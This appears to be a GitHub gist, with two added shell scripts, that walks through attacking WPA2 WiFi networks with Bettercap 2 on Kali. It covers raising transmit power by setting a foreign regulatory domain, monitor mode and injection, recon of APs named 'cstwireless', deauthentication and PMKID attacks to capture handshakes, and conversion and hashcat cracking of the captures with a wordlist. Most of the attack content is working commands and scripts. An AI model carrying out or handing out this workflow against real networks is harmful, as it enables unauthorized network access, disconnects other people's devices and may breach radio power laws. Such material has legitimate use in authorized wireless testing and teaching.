@crgr
Last active April 12, 2024 13:26
WiFi and Bettercap 2 under Kali

Set TX Power to 30 dBm

First, find out which regulatory domain the adapter is currently using:

iw reg get

If it is still the world domain (country 00) or another domain that caps power below 30 dBm, switch to one whose entry in the regulatory database allows 30 dBm, for example BO, BZ, GY, NZ or VE:

iw reg set BZ

This only changes what the kernel will let you configure: the driver or hardware may still clamp the value, adapters whose driver manages its own regulatory domain (iw reg get lists them as self-managed) ignore the change, and transmitting above the limit that legally applies where you are is illegal regardless of what the database says.

Now bring the interface down, set the transmit power (iw takes the value in mBm, hundredths of a dBm, so 3000 means 30 dBm), switch it to monitor mode with control frames passed through, and bring it back up:

ip link set wlan1 down
iw wlan1 set txpower fixed 3000
iw wlan1 set monitor control
ip link set wlan1 up

Check that the adapter can inject frames (aireplay-ng reports "Injection is working!" on success):

aireplay-ng --test wlan1
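The setup above wrapped in a script, as an added example that is not part of the gist: the helper functions parse the output of iw reg get so the script can refuse to proceed when the active domain would make the driver clamp the requested power anyway, and the privileged steps run only when WIFI_IFACE is set. The interface name, the REGDOM/TXPOWER_DBM/FREQ_MHZ variables and the two sample iw reg get outputs are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the gist: the TX-power / monitor-mode steps as
# functions, with a regulatory-domain check in front of them.
# Assumes iw, ip and aireplay-ng are installed; runs the privileged part
# only when WIFI_IFACE is set (e.g. WIFI_IFACE=wlan1 REGDOM=BZ sh tx30.sh).
set -eu

# iw takes transmit power in mBm (hundredths of a dBm): 30 dBm -> 3000.
dbm_to_mbm() { echo $(( $1 * 100 )); }

# Country code from `iw reg get` output (first "country XX:" line, i.e. the
# global domain; a following "phy#N (self-managed)" block is ignored).
reg_country() {
  printf '%s\n' "$1" | awk '/^country/ { sub(":", "", $2); print $2; exit }'
}

# Max EIRP in dBm that the domain allows for the band containing $2 MHz.
# Rule lines look like "(2402 - 2482 @ 40), (N/A, 30), (N/A)": after the
# punctuation is stripped, $1/$3 are the band edges and $6 is the EIRP.
reg_max_eirp() {
  printf '%s\n' "$1" | awk -v f="$2" '
    /^[[:space:]]*\(/ {
      gsub(/[(),@]/, " ")
      if ($1 + 0 <= f + 0 && f + 0 <= $3 + 0) { print $6; exit }
    }'
}

# True when the band containing $2 MHz may be driven at $3 dBm under domain $1.
reg_allows() {
  eirp=$(reg_max_eirp "$1" "$2")
  if [ -n "$eirp" ] && [ "$eirp" -ge "$3" ]; then return 0; fi
  return 1
}

# Constructed samples in the shape iw prints (the world domain caps 2.4 GHz
# at 20 dBm, BZ allows 30 dBm); they let the checks above run offline.
SAMPLE_REG_00='global
country 00: DFS-UNSET
    (2402 - 2472 @ 40), (N/A, 20), (N/A)
    (2457 - 2482 @ 20), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN
    (5170 - 5250 @ 80), (N/A, 20), (N/A), AUTO-BW, PASSIVE-SCAN'
SAMPLE_REG_BZ='global
country BZ: DFS-UNSET
    (2402 - 2482 @ 40), (N/A, 30), (N/A)
    (5170 - 5330 @ 160), (N/A, 30), (N/A)
    (5735 - 5835 @ 80), (N/A, 30), (N/A)'

# The gist's steps, guarded: stop if the domain that is actually active
# after `iw reg set` still caps the band below the requested power.
raise_txpower() {  # $1 = interface, $2 = country code, $3 = dBm, $4 = MHz
  iw reg set "$2"
  regdom=$(iw reg get)
  if ! reg_allows "$regdom" "$4" "$3"; then
    echo "domain $(reg_country "$regdom") caps $4 MHz below $3 dBm" >&2
    return 1
  fi
  ip link set "$1" down
  iw "$1" set txpower fixed "$(dbm_to_mbm "$3")"
  iw "$1" set monitor control
  ip link set "$1" up
  iw "$1" info | grep -E 'type|txpower'   # confirm "type monitor" and the power
  aireplay-ng --test "$1"                 # expect "Injection is working!"
}

if [ -n "${WIFI_IFACE:-}" ]; then
  raise_txpower "$WIFI_IFACE" "${REGDOM:-BZ}" "${TXPOWER_DBM:-30}" "${FREQ_MHZ:-2412}"
fi
```

The check reads the domain back after iw reg set rather than trusting the argument, so a self-managed adapter that silently keeps its own domain is caught before the power is requested.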

Start Bettercap 2 on the interface that now supports monitor mode and injection:

bettercap -iface wlan1

Inside Bettercap start wifi recon:

wifi.recon on

That should produce a steady stream of wifi events: APs found, stations associating and disassociating.

By default Bettercap writes every captured handshake (and PMKID) to ~/bettercap-wifi-handshakes.pcap, which is /root/bettercap-wifi-handshakes.pcap when running as root. To write them to another file:

set wifi.handshakes.file /root/cst/cst-wireless.pcap

To list what the recon has found, run wifi.show. In a crowded area the output fills several screens, so first restrict it with a regular expression that is matched against the SSID:

set wifi.show.filter '^cst.*'

Only APs whose SSID matches the regexp are shown.

Time to show the APs:

wifi.show

┌─────────┬───────────────────┬─────────────┬──────────────────┬─────┬─────┬─────────┬────────┬────────┬──────────┐
│ RSSI ▴  │       BSSID       │    SSID     │    Encryption    │ WPS │ Ch  │ Clients │  Sent  │ Recvd  │   Seen   │
├─────────┼───────────────────┼─────────────┼──────────────────┼─────┼─────┼─────────┼────────┼────────┼──────────┤
│ -40 dBm │ 45:72:6d:82:ef:12 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 60  │ 2       │ 46 kB  │ 11 kB  │ 11:48:49 │
│ -40 dBm │ 45:72:7d:82:ef:13 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 1   │ 1       │ 110 kB │ 5.9 kB │ 11:48:56 │
│ -44 dBm │ 45:72:7d:82:55:26 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 6   │ 2       │ 373 kB │ 150 kB │ 11:48:58 │
│ -49 dBm │ 45:72:6d:87:1a:f1 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 136 │ 1       │ 20 kB  │ 2.3 kB │ 11:48:55 │
│ -64 dBm │ 45:72:7d:87:1a:f2 │ cstwireless │ WPA2 (TKIP, PSK) │     │ 11  │         │        │        │ 11:48:44 │
│ -76 dBm │ 45:72:6d:87:55:ac │ cstwireless │ WPA2 (TKIP, PSK) │     │ 100 │ 8       │ 60 kB  │ 116 kB │ 11:48:54 │
└─────────┴───────────────────┴─────────────┴──────────────────┴─────┴─────┴─────────┴────────┴────────┴──────────┘

The recon hops across every channel the adapter can tune to. To lock it to one channel (for instance the channel of the target AP, so that nothing is missed while hopping):

wifi.recon.channel 1

If stations are connected to the AP, try a deauthentication attack by giving the AP's BSSID (MAC address); Bettercap sends deauth frames to its clients and captures the WPA2 4-way handshake when they reconnect:

wifi.deauth 45:72:6d:82:ef:12

Bettercap prints a message every time a handshake is captured. If no stations are connected, try the PMKID attack instead, which needs only an association with the AP and works only against APs that include a PMKID in the first EAPOL frame:

wifi.assoc 45:72:7d:87:1a:f2

The resulting capture (the path set in wifi.handshakes.file) must be converted into a format hashcat accepts. With hcxpcaptool, -z extracts PMKIDs for hash mode 16800 (full handshakes go out as hccapx with -o, for mode 2500); current hcxtools releases have replaced it with hcxpcapngtool, whose -o output holds both and is cracked with mode 22000:

hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap
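The Bettercap part of the walkthrough as an added example that is not from the gist: a caplet (Bettercap's plain command-per-line script format) carrying the settings from the text plus a ticker that redraws the filtered AP table, and the conversion step for whichever hcxtools converter is installed. The paths, the SSID pattern, the WIFI_IFACE/SSID_RE/PCAP/WORDLIST variables and the wordlist name are illustrative; wifi.deauth and wifi.assoc are still issued by hand at the Bettercap prompt, since their targets come out of the recon.

```shell
#!/bin/sh
# Added example, not from the gist: run the recon from a caplet and convert
# the capture for hashcat. Assumes bettercap 2 (wifi and ticker modules),
# hcxtools and hashcat on the path. Only launches bettercap when WIFI_IFACE
# is set, e.g. WIFI_IFACE=wlan1 SSID_RE='^cst.*' sh recon.sh
set -eu

# Caplet with the settings from the walkthrough plus a ticker that clears
# the screen and re-runs the filtered wifi.show every $3 seconds.
# $1 = SSID regex for wifi.show.filter, $2 = handshake pcap path.
build_caplet() {
  cat <<EOF
set wifi.handshakes.file $2
set wifi.show.filter '$1'
set ticker.period ${3:-10}
set ticker.commands 'clear; wifi.show'
wifi.recon on
ticker on
EOF
}

# hcxpcaptool -z (used in the gist, dropped from hcxtools 6) writes PMKIDs
# only, for hashcat mode 16800; its replacement hcxpcapngtool -o writes
# PMKIDs and EAPOL handshakes together as mode 22000 lines.
hashcat_mode_for() {
  case "$1" in
    hcxpcapngtool) echo 22000 ;;
    hcxpcaptool)   echo 16800 ;;
    *) echo "unknown converter: $1" >&2; return 1 ;;
  esac
}

# Convert $1 (pcap) into $2 with whichever converter exists; prints the
# hashcat mode to use on the result.
convert_capture() {
  for tool in hcxpcapngtool hcxpcaptool; do
    if command -v "$tool" >/dev/null 2>&1; then
      case "$tool" in
        hcxpcapngtool) hcxpcapngtool -o "$2" "$1" ;;
        hcxpcaptool)   hcxpcaptool -z "$2" "$1" ;;
      esac
      hashcat_mode_for "$tool"
      return 0
    fi
  done
  echo "no hcxtools converter found" >&2
  return 1
}

if [ -n "${WIFI_IFACE:-}" ]; then
  pcap=${PCAP:-/root/cst/cst-wireless.pcap}
  caplet=$(mktemp)
  build_caplet "${SSID_RE:-^cst.*}" "$pcap" > "$caplet"
  # Interactive session: watch the table, then run wifi.deauth <bssid> or
  # wifi.assoc <bssid> against your targets; leave with 'exit'.
  bettercap -iface "$WIFI_IFACE" -caplet "$caplet"
  mode=$(convert_capture "$pcap" "${pcap%.pcap}.hc")
  hashcat -m "$mode" "${pcap%.pcap}.hc" "${WORDLIST:-wordlist.txt}"
fi
```

The ticker is what makes the filtered wifi.show useful over a longer recon: it replaces retyping the command and keeps the table current while you pick BSSIDs to deauth or associate with.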